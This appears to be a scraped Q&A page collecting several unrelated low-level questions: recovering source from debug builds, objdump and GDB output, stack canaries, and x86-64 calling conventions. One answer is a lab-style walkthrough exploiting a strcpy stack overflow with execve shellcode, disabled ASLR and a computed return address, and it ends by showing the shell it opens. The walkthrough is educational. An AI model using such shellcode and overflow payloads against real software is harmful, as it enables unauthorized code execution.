Is it possible to obtain the source of a linux shared library (.so) that was compiled with debugging information (gcc .. -g) ? Thank you for your time.
The answer is: it depends - not only is the compile option -g necessary, but also the final created executable / shared libary may not be stripped during the build process.
Object files created with -g do contain a kind of sourcecode - just not sourcecode as you like it ...
If you use objdump -S on such a file, it'll intersperse the disassembly with sourcecode lines.
But what that shows is the actual compiled source - past any operation done by the preprocessor, and past any inlining done by the compiler.
That means you can get surprising output from it; if nothing else, its verbosity can look a bit like Cobol sources. Start with:
#include <algorithm>
#include <functional>
int main(int argc, char **argv)
{
int array[] = { 1, 123, 1234, 12345, 123456 };
std::sort(array, array + sizeof(array)/sizeof(*array), std::less<int>());
return 0;
}
And run it through g++ -O8 -g -o t t.C and then objdump -S t. This will give you the output for main() similar to the following (what exactly you see of course depends on your compiler and/or library):
00000000004005e0 :
#include <algorithm>
#include <functional>
int main(int argc, char **argv)
{
4005e0: 41 57 push %r15
_ValueType<)
__glibcxx_requires_valid_range(__first, __last);
if (__first != __last)
{
std::__introsort_loop(__first, __last,
4005e2: ba 04 00 00 00 mov $0x4,%edx
4005e7: 41 56 push %r14
4005e9: 41 55 push %r13
4005eb: 41 54 push %r12
4005ed: 41 bc 04 00 00 00 mov $0x4,%r12d
4005f3: 55 push %rbp
4005f4: 53 push %rbx
4005f5: 48 83 ec 38 sub $0x38,%rsp
4005f9: 4c 8d 74 24 10 lea 0x10(%rsp),%r14
int array[] = { 1, 123, 1234, 12345, 123456 };
4005fe: c7 44 24 10 01 00 00 movl $0x1,0x10(%rsp)
400605: 00
400606: c7 44 24 14 7b 00 00 movl $0x7b,0x14(%rsp)
40060d: 00
40060e: c7 44 24 18 d2 04 00 movl $0x4d2,0x18(%rsp)
400615: 00
400616: c7 44 24 1c 39 30 00 movl $0x3039,0x1c(%rsp)
40061d: 00
40061e: 4d 8d 7e 14 lea 0x14(%r14),%r15
400622: 49 8d 6e 08 lea 0x8(%r14),%rbp
400626: 4c 89 f7 mov %r14,%rdi
400629: c7 44 24 20 40 e2 01 movl $0x1e240,0x20(%rsp)
400630: 00
400631: c6 04 24 00 movb $0x0,(%rsp)
400635: 4c 89 fe mov %r15,%rsi
400638: e8 73 01 00 00 callq 4007b0 <_ZSt16__introsort_loopIPilSt4lessIiEEvT_S3_T0_T1_>
40063d: eb 01 jmp 400640 <main+0x60>
40063f: 90 nop
if (__first == __last) return;
for (_RandomAccessIterator __i = __first + 1; __i != __last; ++__i)
{
typename iterator_traits<_RandomAccessIterator>::value_type
__val = *__i;
400640: 8b 5d fc mov -0x4(%rbp),%ebx
if (__comp(__val, *__first))
400643: 3b 5c 24 10 cmp 0x10(%rsp),%ebx
_ValueType>)
__glibcxx_requires_valid_range(__first, __last);
if (__first != __last)
{
std::__introsort_loop(__first, __last,
400647: 4b 8d 0c 34 lea (%r12,%r14,1),%rcx
for (_RandomAccessIterator __i = __first + 1; __i != __last; ++__i)
{
typename iterator_traits<_RandomAccessIterator>::value_type
__val = *__i;
if (__comp(__val, *__first))
40064b: 7c 53 jl 4006a0 <main+0xc0>
template<typename _Tp>
struct less : public binary_function<_Tp, _Tp, bool>
{
bool
operator()(const _Tp& __x, const _Tp& __y) const
{ return __x < __y; }
40064d: 8b 55 f8 mov -0x8(%rbp),%edx
{
std::copy_backward(__first, __i, __i + 1);
*__first = __val;
400650: 48 8d 45 f8 lea -0x8(%rbp),%rax
__unguarded_linear_insert(_RandomAccessIterator __last, _Tp __val,
_Compare __comp)
{
_RandomAccessIterator __next = __last;
--__next;
while (__comp(__val, *__next))
400654: 39 d3 cmp %edx,%ebx
400656: 7c 0e jl 400666 <main+0x86>
400658: eb 1c jmp 400676 <main+0x96>
40065a: eb 04 jmp 400660 <main+0x80>
40065c: 90 nop
40065d: 90 nop
40065e: 90 nop
40065f: 90 nop
400660: 48 89 c1 mov %rax,%rcx
400663: 48 89 f0 mov %rsi,%rax
{
*__last = *__next;
400666: 89 11 mov %edx,(%rcx)
400668: 8b 50 fc mov -0x4(%rax),%edx
__last = __next;
--__next;
40066b: 48 8d 70 fc lea -0x4(%rax),%rsi
__unguarded_linear_insert(_RandomAccessIterator __last, _Tp __val,
_Compare __comp)
{
_RandomAccessIterator __next = __last;
--__next;
while (__comp(__val, *__next))
40066f: 39 d3 cmp %edx,%ebx
400671: 7c ed jl 400660 <main+0x80>
400673: 48 89 c1 mov %rax,%rcx
{
*__last = *__next;
__last = __next;
--__next;
}
*__last = __val;
400676: 89 19 mov %ebx,(%rcx)
400678: 49 89 ed mov %rbp,%r13
40067b: 48 83 c5 04 add $0x4,%rbp
40067f: 49 83 c4 04 add $0x4,%r12
__insertion_sort(_RandomAccessIterator __first,
_RandomAccessIterator __last, _Compare __comp)
{
if (__first == __last) return;
for (_RandomAccessIterator __i = __first + 1; __i != __last; ++__i)
400683: 4d 39 ef cmp %r13,%r15
400686: 75 b8 jne 400640 <main+0x60>
std::sort(array, array + sizeof(array)/sizeof(*array), std::less<int>());
return 0;
}
400688: 48 83 c4 38 add $0x38,%rsp
40068c: 31 c0 xor %eax,%eax
40068e: 5b pop %rbx
40068f: 5d pop %rbp
400690: 41 5c pop %r12
400692: 41 5d pop %r13
400694: 41 5e pop %r14
400696: 41 5f pop %r15
400698: c3 retq
400699: eb 05 jmp 4006a0 <main+0xc0>
How helpful the presence of this "sourcecode" would be is left as an exercise to the reader at this point ;-)
Tricky question. The easy answer is No, you can't.
However, if you understand assembly you can use tools like objdump, gdb and others to disassemble the application. And from the assembly a skilled programmer can re-write the application. This is no easy task, and it gets more difficult depending on how complex the target application is.
The fact is that release versions are not (or shouldn't) be compiled with -g.
If you mean by decompiling, look at decompilers (IDA Pro, e.g.); Having debug information can help greatly, especially if you're not interested in the full source.
You can use the debug symbols to identify starting points of procedures that you are interested in. Using a good reverse engineering tool (like IDA or the very excellent OllyDbg) you can get annotated disassembly for those parts. OllyDbg and IDA are able to a certain extent to generate C code from the disassembly.
Having the symbols, again, helps, but is no magic pill
No. The debugging information just contains information about the symbols, i.e. the variables and functions but does not contain the code itself.
Related
Short Story
I am writing a simple program in Assembly to simulate buffer overflow. The buffer is simply memory allocation from 512 bytes stack and then read() syscall is called with 4096 bytes from stdin fd.
The buffer overflow is working perfectly when I execute the payload outside GDB. But when I am inside the GDB, the syscall read() returns EFAULT.
In this case, our buffer overflow is supposed to replace return address and make the %rip reach secret_func.
Question
Why in this case buffer overflow does not work inside GDB?
Resources
Code test.S
.section .rodata
str1:
.ascii "Enter the input: "
str2:
.ascii "\nYou find a secret function!\n"
str_end:
.section .text
.global _start
_start:
xorl %ebp, %ebp
andq $-16, %rsp
callq main
_exit:
movl %eax, %edi
movl $60, %eax
syscall
main:
subq $512, %rsp
movl $1, %eax
movl $1, %edi
leaq str1(%rip), %rsi
movl $(str2 - str1), %edx
syscall
xorl %eax, %eax
xorl %edi, %edi
movq %rsp, %rsi
movl $4096, %edx # Intentional to create buffer overflow
syscall
addq $512, %rsp
xorl %eax, %eax
retq
# We reach this function via buffer overflow (replace return address)
secret_func:
movl $1, %eax
movl $1, %edi
leaq str2(%rip), %rsi
movl $(str_end - str2), %edx
syscall
xorl %eax, %eax
jmp _exit
objdump of compiled ELF
Disassembly of section .text:
0000000000401000 <_start>:
401000: 31 ed xor %ebp,%ebp
401002: 48 83 e4 f0 and $0xfffffffffffffff0,%rsp
401006: e8 09 00 00 00 call 401014 <main>
000000000040100b <_exit>:
40100b: 89 c7 mov %eax,%edi
40100d: b8 3c 00 00 00 mov $0x3c,%eax
401012: 0f 05 syscall
0000000000401014 <main>:
401014: 48 81 ec 00 02 00 00 sub $0x200,%rsp
40101b: b8 01 00 00 00 mov $0x1,%eax
401020: bf 01 00 00 00 mov $0x1,%edi
401025: 48 8d 35 d4 0f 00 00 lea 0xfd4(%rip),%rsi # 402000 <str1>
40102c: ba 11 00 00 00 mov $0x11,%edx
401031: 0f 05 syscall
401033: 31 c0 xor %eax,%eax
401035: 31 ff xor %edi,%edi
401037: 48 89 e6 mov %rsp,%rsi
40103a: ba 00 10 00 00 mov $0x1000,%edx
40103f: 0f 05 syscall
401041: 48 81 c4 00 02 00 00 add $0x200,%rsp
401048: 31 c0 xor %eax,%eax
40104a: c3 ret
000000000040104b <secret_func>:
40104b: b8 01 00 00 00 mov $0x1,%eax
401050: bf 01 00 00 00 mov $0x1,%edi
401055: 48 8d 35 b5 0f 00 00 lea 0xfb5(%rip),%rsi # 402011 <str2>
40105c: ba 1d 00 00 00 mov $0x1d,%edx
401061: 0f 05 syscall
401063: 31 c0 xor %eax,%eax
401065: eb a4 jmp 40100b <_exit>
Reproduction Steps
Compile and run without GDB (working fine)
In this case, we calculate the offset of return address and replace it with secret_func address.
ammarfaizi2#integral:/tmp$ gcc -O3 -no-pie -static -nostartfiles -ffreestanding test.S -o test
ammarfaizi2#integral:/tmp$ perl -e 'print "A"x512,"\x4b\x10\x40","\x00"x5' > payload
ammarfaizi2#integral:/tmp$ ./test < payload
Enter the input:
You find a secret function!
ammarfaizi2#integral:/tmp$
Compile and run inside the GDB (read() returns -14 (-EFAULT))
We stepped the read() syscall and found it returns -14. It does not read from stdin at all.
gef➤ b main
Breakpoint 1 at 0x401014
gef➤ r < input
[... GEF output elided ...]
gef➤ si 11
[... GEF output elided ...]
gef➤ x/5i $rip
=> 0x401041 <main+45>: add $0x200,%rsp
0x401048 <main+52>: xor %eax,%eax
0x40104a <main+54>: ret
0x40104b <secret_func>: mov $0x1,%eax
0x401050 <secret_func+5>: mov $0x1,%edi
gef➤ p/d $rax
$2 = -14
gef➤ shell errno 14
EFAULT 14 Bad address
gef➤
GDB and Linux Version
ammarfaizi2#integral:/tmp$ gdb --version
GNU gdb (Ubuntu 10.1-2ubuntu2) 10.1.90.20210411-git
Copyright (C) 2021 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.
ammarfaizi2#integral:/tmp$ uname -r
5.13.0-rc2-fresh-tea-00005-g8ac91e6c6033
ammarfaizi2#integral:/tmp$
I am trying to take control of this program with a shellcode.
#include <string.h>
#include <stdio.h>
void func (char * arg)
{
char name [32];
strcpy (name, arg);
printf ("\ nHello% s \ n \ n", name);
}
int main (int argc, char * argv [])
{
if (argc! = 2) {
printf ("Usage:% s NAME \ n", argv [0]);
exit (0);
}
func (argv [1]);
printf ("End of program \ n \ n");
return 0;
}
With 40 Aes, this is when the segment violation occurs and therefore the EIP record has been overwritten. Since my shellcode is 23 characters long, I input 17 Aes to exploit it. But I need the address of the beginning of the "name" buffer for the shellcode to run there.
In this case, as there is only one variable, it would be worth knowing the address of ESP, since, being the top of the stack, it will match.
I've seen this program that gets you an address close to ESP:
#include <stdio.h>
unsigned long get_sp (void) {
__asm __ ("movl% esp,% eax");
}
leading void () {
printf ("0x% x \ n", get_sp ());
}
However, I always get the segment violation signal, executing the following:
./my_program `perl -e 'print" \x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80 ". "A" x17. "ESP address" '`
The program is compiled like this:
gcc -fno-stack-protector -D_FORTIFY_SOURCE = 0 -z norelro -z execstack my_program.c -o my_program
How can I get the extreme address of the beginning of the buffer or ESP?
0. Turn ASLR off
To do it easily, we can disable ASLR. In real world exploit, we will need to brute force the address as the address is randomized.
echo 0 | sudo tee /proc/sys/kernel/randomize_va_space
1. Compilation
ammarfaizi2#integral:~/ex/exp$ cat my_program.c
#include <string.h>
#include <stdio.h>
#include <stdlib.h>
void func(char *arg)
{
char name[32];
strcpy(name, arg);
printf("\nHello %s \n\n", name);
}
int main(int argc, char *argv[])
{
if (argc != 2) {
printf("Usage: %s NAME \n", argv[0]);
exit(0);
}
func(argv[1]);
printf("End of program \n\n");
return 0;
}
ammarfaizi2#integral:~/ex/exp$ gcc -fno-stack-protector -zexecstack -m32 my_program.c -o my_program
ammarfaizi2#integral:~/ex/exp$
2. Calculating Offset
0000122d <func>:
122d: f3 0f 1e fb endbr32
1231: 55 push %ebp
1232: 89 e5 mov %esp,%ebp
/*
*
* At this point, we know what return address is located at
* 0x4(%ebp).
*
*/
1234: 53 push %ebx
1235: 83 ec 24 sub $0x24,%esp
1238: e8 f3 fe ff ff call 1130 <__x86.get_pc_thunk.bx>
123d: 81 c3 8f 2d 00 00 add $0x2d8f,%ebx
1243: 83 ec 08 sub $0x8,%esp
1246: ff 75 08 push 0x8(%ebp)
1249: 8d 45 d8 lea -0x28(%ebp),%eax
124c: 50 push %eax
124d: e8 5e fe ff ff call 10b0 <strcpy#plt>
/*
*
* At this point, we know that the command line argument
* is copied to -0x28(%ebp)
*
*/
1252: 83 c4 10 add $0x10,%esp
1255: 83 ec 08 sub $0x8,%esp
1258: 8d 45 d8 lea -0x28(%ebp),%eax
125b: 50 push %eax
125c: 8d 83 3c e0 ff ff lea -0x1fc4(%ebx),%eax
1262: 50 push %eax
1263: e8 38 fe ff ff call 10a0 <printf#plt>
1268: 83 c4 10 add $0x10,%esp
126b: 90 nop
126c: 8b 5d fc mov -0x4(%ebp),%ebx
126f: c9 leave
1270: c3 ret
To overwrite return address from -0x28(%ebp), we need to write 0x4 - (-0x28) bytes (44 bytes).
We have 23 bytes shell code.
We need 21 bytes padding to make our payload be 44 bytes to reach return address.
We need 4 bytes malicious return address, we take \x11\x11\x11\x11 at the moment, as we don't yet know.
Test Execute
ammarfaizi2#integral:~/ex/exp$ ./my_program $(perl -e 'print "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80","A"x21,"\x11\x11\x11\x11"')
Hello 1�Ph//shh/bin��PS��
AAAAAAAAAAAAAAAAAAAAA
Segmentation fault (core dumped)
ammarfaizi2#integral:~/ex/exp$ dmesg | tail -n 2
[56448.175467] my_program[117895]: segfault at 11111111 ip 0000000011111111 sp 00000000ffffd3c0 error 14 in my_program[56555000+1000]
[56448.175493] Code: Bad RIP value.
ammarfaizi2#integral:~/ex/exp$
At this point we have been able to overwrite EIP value. So the next is to find the shell code address.
3. Finding Shell Code Address
Notice that segfault happens when the leave and ret undo the esp value. So we need to find how many bytes is subtracted when func stack frame is created.
Notice how esp changes
; From main function
call func ; -4 bytes
; Setup stack frame
push %ebp ; -4 bytes
mov %esp,%ebp ; At this point %ebp = %esp
We undo -8 bytes, and our shell code is located -0x28(%ebp). So we have -48 bytes total.
Last segfault is at SP = 0xffffd3c0
Hence target return address is 0xffffd3c0 - 48 = 0xffffd390.
4. Execute Exploit
Notice that x86 is little endian byte order, so we need to reverse our payload (by byte).
ffffd390 we write it as \x90\xd3\xff\xff.
So Replace \x11\x11\x11\x11 with \x90\xd3\xff\xff
ammarfaizi2#integral:~/ex/exp$ ./my_program $(perl -e 'print "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80","A"x21,"\x90\xd3\xff\xff"')
Hello 1�Ph//shh/bin��PS��
AAAAAAAAAAAAAAAAAAAAA����
$ date
Sat Apr 3 14:47:02 WIB 2021
$ whoami
ammarfaizi2
$ exit
ammarfaizi2#integral:~/ex/exp$
1. Turn off ASLR and compilation
cat /proc/sys/kernel/randomize_va_space
0
gcc -fno-stack-protector -zexecstack -m32 prog.c -o prog2
08048474 <func>:
8048474: 55 push %ebp
8048475: 89 e5 mov %esp,%ebp
8048477: 83 ec 38 sub $0x38,%esp
804847a: 8b 45 08 mov 0x8(%ebp),%eax
804847d: 89 44 24 04 mov %eax,0x4(%esp)
8048481: 8d 45 d8 lea -0x28(%ebp),%eax
8048484: 89 04 24 mov %eax,(%esp)
8048487: e8 e4 fe ff ff call 8048370 <strcpy#plt>
804848c: b8 d0 85 04 08 mov $0x80485d0,%eax
8048491: 8d 55 d8 lea -0x28(%ebp),%edx
8048494: 89 54 24 04 mov %edx,0x4(%esp)
8048498: 89 04 24 mov %eax,(%esp)
804849b: e8 c0 fe ff ff call 8048360 <printf#plt>
80484a0: c9 leave
80484a1: c3 ret
080484a2 <main>:
80484a2: 55 push %ebp
80484a3: 89 e5 mov %esp,%ebp
80484a5: 83 e4 f0 and $0xfffffff0,%esp
80484a8: 83 ec 10 sub $0x10,%esp
80484ab: 83 7d 08 02 cmpl $0x2,0x8(%ebp)
80484af: 74 22 je 80484d3 <main+0x31>
80484b1: 8b 45 0c mov 0xc(%ebp),%eax
80484b4: 8b 10 mov (%eax),%edx
80484b6: b8 f5 85 04 08 mov $0x80485f5,%eax
80484bb: 89 54 24 04 mov %edx,0x4(%esp)
80484bf: 89 04 24 mov %eax,(%esp)
80484c2: e8 99 fe ff ff call 8048360 <printf#plt>
80484c7: c7 04 24 00 00 00 00 movl $0x0,(%esp)
80484ce: e8 cd fe ff ff call 80483a0 <exit#plt>
80484d3: 8b 45 0c mov 0xc(%ebp),%eax
80484d6: 83 c0 04 add $0x4,%eax
80484d9: 8b 00 mov (%eax),%eax
80484db: 89 04 24 mov %eax,(%esp)
80484de: e8 91 ff ff ff call 8048474 <func>
80484e3: c7 04 24 05 86 04 08 movl $0x8048605,(%esp)
80484ea: e8 91 fe ff ff call 8048380 <puts#plt>
80484ef: b8 00 00 00 00 mov $0x0,%eax
80484f4: c9 leave
80484f5: c3 ret
2. Test Excute
./prog2 $(perl -e 'print "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80" . "A" x21 . "\x11\x11\x11\x11"')
Hello 1▒Ph//shh/bin▒▒PS▒▒
̀AAAAAAAAAAAAAAAAAAAAA
Segmentation fault (core dumped)
dmesg | tail -n 2
[82020.945063] prog2[11078]: segfault at d0080484 ip bffff71c sp bffff760 error 5
[82669.199863] prog2[11100]: segfault at 11111111 ip 11111111 sp bffff760 error 14
Last segfault is at 0xbffff760, so: 0xbffff760 - 48 = 0xbffff718
./prog2 $(perl -e 'print "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80" . "A" x21 . "\x18\xf7\xff\xbf"')
Hello 1▒Ph//shh/bin▒▒PS▒▒
̀AAAAAAAAAAAAAAAAAAAAA▒▒▒
Segmentation fault (core dumped)
dmesg | tail -n 2
[82669.199863] prog2[11100]: segfault at 11111111 ip 11111111 sp bffff760 error 14
[82857.841068] prog2[11108] general protection ip:bffff718 sp:bffff760 error:0
Who is responsible for inserting the stack canaries in the stack? Is it the OS?
If yes, how can the gcc compiler disable them by using the -fno-stack-protector option? Or it is only a flag created using that option and added to the binary to tell the OS to not insert canaries in the stack where the binary is loaded at runtime?
EDIT: one more question
Who checks the value of the canaries if they were changed over the execution?
Again if inserted by the compiler, how can be checked by the OS? If inserted by the OS how can it be disabled by the compiler (main question)?
Who is responsible for inserting the stack canaries in the stack?
The compiler. The code for creating and checking stack canaries is a subset of the code generated by the compiler from the program source code.
For GCC:
-fstack-protector
Emit extra code to check for buffer overflows, such as stack smashing attacks. This is done by adding a guard variable to functions with vulnerable objects. This includes functions that call alloca, and functions with buffers larger than 8 bytes. The guards are initialized when a function is entered and then checked when the function exits. If a guard check fails, an error message is printed and the program exits.
The aforementioned "guard variable" is commonly referred to as a canary:
The basic idea behind stack protection is to push a "canary" (a randomly chosen integer) on the stack just after the function return pointer has been pushed. The canary value is then checked before the function returns; if it has changed, the program will abort. Generally, stack buffer overflow (aka "stack smashing") attacks will have to change the value of the canary as they write beyond the end of the buffer before they can get to the return pointer. Since the value of the canary is unknown to the attacker, it cannot be replaced by the attack. Thus, the stack protection allows the program to abort when that happens rather than return to wherever the attacker wanted it to go.1
Example program:
Source code:
int test(int i) {
return i;
}
int main(void) {
int x;
int i = 10;
x = test(i);
return x;
}
Function from binary compiled without -fstack-protector-all:
$ objdump -dj .text test | grep -A7 "<test>:"
00000000004004ed <test>:
4004ed: 55 push %rbp
4004ee: 48 89 e5 mov %rsp,%rbp
4004f1: 89 7d fc mov %edi,-0x4(%rbp)
4004f4: 8b 45 fc mov -0x4(%rbp),%eax
4004f7: 5d pop %rbp
4004f8: c3 retq
Function from binary compiled with -fstack-protector-all:
$ objdump -dj .text protected_test | grep -A20 "<test>:"
000000000040055d <test>:
40055d: 55 push %rbp
40055e: 48 89 e5 mov %rsp,%rbp
400561: 48 83 ec 20 sub $0x20,%rsp
400565: 89 7d ec mov %edi,-0x14(%rbp)
400568: 64 48 8b 04 25 28 00 mov %fs:0x28,%rax <- get guard variable value
40056f: 00 00
400571: 48 89 45 f8 mov %rax,-0x8(%rbp) <- save guard variable on stack
400575: 31 c0 xor %eax,%eax
400577: 8b 45 ec mov -0x14(%rbp),%eax
40057a: 48 8b 55 f8 mov -0x8(%rbp),%rdx <- move it to register
40057e: 64 48 33 14 25 28 00 xor %fs:0x28,%rdx <- check it against original
400585: 00 00
400587: 74 05 je 40058e <test+0x31>
400589: e8 b2 fe ff ff callq 400440 <__stack_chk_fail#plt>
40058e: c9 leaveq
40058f: c3 retq
1. "Strong" stack protection for GCC
I am currently practicing with assembly reading by disassemblying C programs and trying to understand what they do.
I am stuck with a trivial one: a simple hello world program.
#include <stdio.h>
#include <stdlib.h>
int main() {
printf("Hello, world!");
return(0);
}
When I disassemble the main:
(gdb) disassemble main
Dump of assembler code for function main:
0x0000000000400526 <+0>: push rbp
0x0000000000400527 <+1>: mov rbp,rsp
0x000000000040052a <+4>: mov edi,0x4005c4
0x000000000040052f <+9>: mov eax,0x0
0x0000000000400534 <+14>: call 0x400400 <printf#plt>
0x0000000000400539 <+19>: mov eax,0x0
0x000000000040053e <+24>: pop rbp
0x000000000040053f <+25>: ret
I understand the first two lines: the base pointer is saved on the stack (by push rbp, which causes the value of the stack pointer to be decreased by 8, because it has "grown") and the value of the stack pointer is saved in the base pointer (so that parameters and local variable can be easily reached through positive and negative offsets, respectively, while the stack can keep "growing").
The third line presents the first issue: why is 0x4005c4 (the address of the "Hello, World!" string) moved in the edi register instead of moving it on the stack? Shouldn't the printf function take the address of that string as parameter? For what I know, functions take parameters from the stack (but here, it looks like the parameter is put in that register: edi)
On another post here on StackOverflow I read that "printf#ptl" is like a stub function that calls the real printf function. I tried to disassemble that function, but it gets even more confusing:
(gdb) disassemble printf
Dump of assembler code for function __printf:
0x00007ffff7a637b0 <+0>: sub rsp,0xd8
0x00007ffff7a637b7 <+7>: test al,al
0x00007ffff7a637b9 <+9>: mov QWORD PTR [rsp+0x28],rsi
0x00007ffff7a637be <+14>: mov QWORD PTR [rsp+0x30],rdx
0x00007ffff7a637c3 <+19>: mov QWORD PTR [rsp+0x38],rcx
0x00007ffff7a637c8 <+24>: mov QWORD PTR [rsp+0x40],r8
0x00007ffff7a637cd <+29>: mov QWORD PTR [rsp+0x48],r9
0x00007ffff7a637d2 <+34>: je 0x7ffff7a6380b <__printf+91>
0x00007ffff7a637d4 <+36>: movaps XMMWORD PTR [rsp+0x50],xmm0
0x00007ffff7a637d9 <+41>: movaps XMMWORD PTR [rsp+0x60],xmm1
0x00007ffff7a637de <+46>: movaps XMMWORD PTR [rsp+0x70],xmm2
0x00007ffff7a637e3 <+51>: movaps XMMWORD PTR [rsp+0x80],xmm3
0x00007ffff7a637eb <+59>: movaps XMMWORD PTR [rsp+0x90],xmm4
0x00007ffff7a637f3 <+67>: movaps XMMWORD PTR [rsp+0xa0],xmm5
0x00007ffff7a637fb <+75>: movaps XMMWORD PTR [rsp+0xb0],xmm6
0x00007ffff7a63803 <+83>: movaps XMMWORD PTR [rsp+0xc0],xmm7
0x00007ffff7a6380b <+91>: lea rax,[rsp+0xe0]
0x00007ffff7a63813 <+99>: mov rsi,rdi
0x00007ffff7a63816 <+102>: lea rdx,[rsp+0x8]
0x00007ffff7a6381b <+107>: mov QWORD PTR [rsp+0x10],rax
0x00007ffff7a63820 <+112>: lea rax,[rsp+0x20]
0x00007ffff7a63825 <+117>: mov DWORD PTR [rsp+0x8],0x8
0x00007ffff7a6382d <+125>: mov DWORD PTR [rsp+0xc],0x30
0x00007ffff7a63835 <+133>: mov QWORD PTR [rsp+0x18],rax
0x00007ffff7a6383a <+138>: mov rax,QWORD PTR [rip+0x36d70f] # 0x7ffff7dd0f50
0x00007ffff7a63841 <+145>: mov rdi,QWORD PTR [rax]
0x00007ffff7a63844 <+148>: call 0x7ffff7a5b130 <_IO_vfprintf_internal>
0x00007ffff7a63849 <+153>: add rsp,0xd8
0x00007ffff7a63850 <+160>: ret
End of assembler dump.
The two mov operations on eax (mov eax, 0x0) bother me a little as well, since I don't get they role in here (but I am more concerned with what I have just described).
Thank you in advance.
gcc is targeting the x86-64 System V ABI, used by all x86-64 systems other than Windows (for various historical reasons). Its calling convention passes the first few args in registers before falling back to the stack. (See also the Wikipedia basic summary of this calling convention.)
And yes, this is different from the crusty old 32-bit calling conventions that use the stack for everything. This is a Good Thing. See also the x86 tag wiki for more links to ABI docs, and tons of other stuff.
0x0000000000400526: push rbp
0x0000000000400527: mov rbp,rsp # stack-frame boilerplate
0x000000000040052a: mov edi,0x4005c4 # first arg
0x000000000040052f: mov eax,0x0 # 0 FP args in vector registers
0x0000000000400534: call 0x400400 <printf#plt>
0x0000000000400539: mov eax,0x0 # return 0. If you'd compiled with optimization, this and the previous mov would be xor eax,eax
0x000000000040053e: pop rbp # clean up stack frame
0x000000000040053f: ret
Pointers to static data fit into 32 bits, which is why it can use mov edi, imm32 instead of movabs rdi, imm64.
Floating-point args are passed in SSE registers (xmm0-xmm7), even to var-args functions. al indicates how many FP args are in vector registers. (Note that C's type promotion rules mean that float args to variadic functions are always promoted to double, which is why printf doesn't have any format specifiers for float, only double and long double).
printf#ptl is like a stub function that calls the real printf function.
Yes, that's right. The Procedure Linking Table entry starts out as a jmp to a dynamic linker routine that resolves the symbol and modifies the code in the PLT to turn it into a jmp directly to the address where libc's printf definition is mapped. printf is a weak alias for __printf, which is why gdb chooses the __printf label for that address, after you asked for disassembly of printf.
Dump of assembler code for function __printf:
0x00007ffff7a637b0 <+0>: sub rsp,0xd8 # reserve space
0x00007ffff7a637b7 <+7>: test al,al # check if there were any FP args
0x00007ffff7a637b9 <+9>: mov QWORD PTR [rsp+0x28],rsi # store the integer arg-passing registers to local scratch space
0x00007ffff7a637be <+14>: mov QWORD PTR [rsp+0x30],rdx
0x00007ffff7a637c3 <+19>: mov QWORD PTR [rsp+0x38],rcx
0x00007ffff7a637c8 <+24>: mov QWORD PTR [rsp+0x40],r8
0x00007ffff7a637cd <+29>: mov QWORD PTR [rsp+0x48],r9
0x00007ffff7a637d2 <+34>: je 0x7ffff7a6380b <__printf+91> # skip storing the FP arg-passing regs if there were no FP args
0x00007ffff7a637d4 <+36>: movaps XMMWORD PTR [rsp+0x50],xmm0
0x00007ffff7a637d9 <+41>: movaps XMMWORD PTR [rsp+0x60],xmm1
0x00007ffff7a637de <+46>: movaps XMMWORD PTR [rsp+0x70],xmm2
0x00007ffff7a637e3 <+51>: movaps XMMWORD PTR [rsp+0x80],xmm3
0x00007ffff7a637eb <+59>: movaps XMMWORD PTR [rsp+0x90],xmm4
0x00007ffff7a637f3 <+67>: movaps XMMWORD PTR [rsp+0xa0],xmm5
0x00007ffff7a637fb <+75>: movaps XMMWORD PTR [rsp+0xb0],xmm6
0x00007ffff7a63803 <+83>: movaps XMMWORD PTR [rsp+0xc0],xmm7
branch_target_from_test_je:
0x00007ffff7a6380b <+91>: lea rax,[rsp+0xe0] # some more stuff
So printf's implementation keeps the var-args handling simple by storing all the arg-passing registers (except the first one holding the format string) in order to local arrays. It can walk a pointer through them instead of needing switch-like code to extract the right integer or FP arg. It still needs to keep track of the first 5 integer and first 8 FP args, because they aren't contiguous with the rest of the args pushed by the caller onto the stack.
The Windows 64-bit calling convention's shadow space simplifies this by providing space for a function to dump its register args to the stack contiguous with the args already on the stack, but that's not worth wasting 32 bytes of stack on every call, IMO. (See my answer and comments on other answers on Why does Windows64 use a different calling convention from all other OSes on x86-64?)
there is nothing trivial about printf, not the first choice for what you are trying to do but, turned out to be not overly complicated.
Something simpler:
extern unsigned int more_fun ( unsigned int );
unsigned int fun ( unsigned int x )
{
return(more_fun(x)+7);
}
0000000000000000 <fun>:
0: 48 83 ec 08 sub $0x8,%rsp
4: e8 00 00 00 00 callq 9 <fun+0x9>
9: 48 83 c4 08 add $0x8,%rsp
d: 83 c0 07 add $0x7,%eax
10: c3 retq
and the stack is used. eax used for the return.
now use a pointer
extern unsigned int more_fun ( unsigned int * );
unsigned int fun ( unsigned int x )
{
return(more_fun(&x)+7);
}
0000000000000000 <fun>:
0: 48 83 ec 18 sub $0x18,%rsp
4: 89 7c 24 0c mov %edi,0xc(%rsp)
8: 48 8d 7c 24 0c lea 0xc(%rsp),%rdi
d: e8 00 00 00 00 callq 12 <fun+0x12>
12: 48 83 c4 18 add $0x18,%rsp
16: 83 c0 07 add $0x7,%eax
19: c3 retq
and there you go edi used as in your case.
two pointers
extern unsigned int more_fun ( unsigned int *, unsigned int * );
unsigned int fun ( unsigned int x, unsigned int y )
{
return(more_fun(&x,&y)+7);
}
0000000000000000 <fun>:
0: 48 83 ec 18 sub $0x18,%rsp
4: 89 7c 24 0c mov %edi,0xc(%rsp)
8: 89 74 24 08 mov %esi,0x8(%rsp)
c: 48 8d 7c 24 0c lea 0xc(%rsp),%rdi
11: 48 8d 74 24 08 lea 0x8(%rsp),%rsi
16: e8 00 00 00 00 callq 1b <fun+0x1b>
1b: 48 83 c4 18 add $0x18,%rsp
1f: 83 c0 07 add $0x7,%eax
22: c3 retq
